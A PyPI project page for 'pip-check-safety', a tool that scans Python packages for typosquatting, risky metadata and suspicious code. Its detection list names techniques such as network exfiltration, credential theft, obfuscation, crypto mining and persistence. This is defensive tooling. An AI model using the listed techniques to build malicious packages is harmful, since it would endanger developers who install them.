Scan pip packages for security risks before and after installation
Project description
pip-check-safety
Scan pip packages for security risks before and after installation.
Features
- Pre-installation checks: Scan packages before you install them
- Typosquatting detection: Catch packages trying to impersonate popular libraries
- Code scanning: Detect suspicious patterns like crypto miners, data exfiltration, obfuscation
- Environment audits: Scan all your installed packages at once
- Requirements scanning: Check your requirements.txt before deployment
Installation
pip install pip-check-safety
Usage
Check a package before installing
pip-check requests
Deep scan (downloads and analyzes source code)
pip-check --deep some-package
Audit all installed packages
pip-check --audit
Check a requirements file
pip-check -r requirements.txt
JSON output for CI/CD
pip-check --json requests
pip-check --audit --json
What it checks
PyPI Metadata
- Package age (brand new packages are higher risk)
- Download count (low downloads = less community vetting)
- Author information
- Source repository presence
Typosquatting
- Levenshtein distance to popular packages
- Common character swaps (0/o, 1/l, rn/m)
- Hyphen/underscore variations
- Suspicious suffixes (-official, -secure, etc.)
Code Patterns (deep scan)
- Dynamic code execution (exec, eval)
- Network exfiltration (socket connections, HTTP requests)
- Obfuscation (base64, marshal, ROT encoding)
- System access (subprocess, os.system)
- Credential theft patterns
- Crypto mining indicators
- Persistence mechanisms
Exit Codes
0- No issues or low risk only1- Medium risk findings2- High risk findings3- Critical risk findings
Use exit codes in CI/CD pipelines:
pip-check --audit
if [ $? -ge 2 ]; then
echo "High-risk packages detected!"
exit 1
fi
Python API
from pip_check import PyPIChecker, TyposquatDetector, CodeScanner, EnvironmentAuditor
# Check a single package
checker = PyPIChecker()
report = checker.check("requests")
report.print_report()
# Detect typosquatting
detector = TyposquatDetector()
report = detector.check("reqeusts") # typo
print(report.findings)
# Scan installed package code
scanner = CodeScanner()
report = scanner.scan_installed("some-package")
# Audit entire environment
auditor = EnvironmentAuditor(deep_scan=True)
reports = auditor.audit_all()
auditor.print_summary(reports)
License
MIT
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pip_check_safety-1.0.0.tar.gz
(15.2 kB
view details)
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file pip_check_safety-1.0.0.tar.gz.
File metadata
- Download URL: pip_check_safety-1.0.0.tar.gz
- Upload date:
- Size: 15.2 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.12.3
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
242107bfbf73d17f25cdb963896bd45806b4baeba6375b382cedf775902470e9
|
|
| MD5 |
851c1f80be5dc0ad7fbcd4cfe1338945
|
|
| BLAKE2b-256 |
e1a7a11322bc118f6d703fd87af7999022829c15ca0762c9f696b3a99ef45b69
|
File details
Details for the file pip_check_safety-1.0.0-py3-none-any.whl.
File metadata
- Download URL: pip_check_safety-1.0.0-py3-none-any.whl
- Upload date:
- Size: 16.6 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.12.3
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
1093b80107386d1729e6425cf4db1b317d37b6e9c88a7bb623e613eafd510d23
|
|
| MD5 |
b08174fc5a00478fd5c1f5d046c00573
|
|
| BLAKE2b-256 |
d0e28459a6bbff93e0adc77b9f30358cddd60d2e7e3308f36645406ee3ba5c3b
|
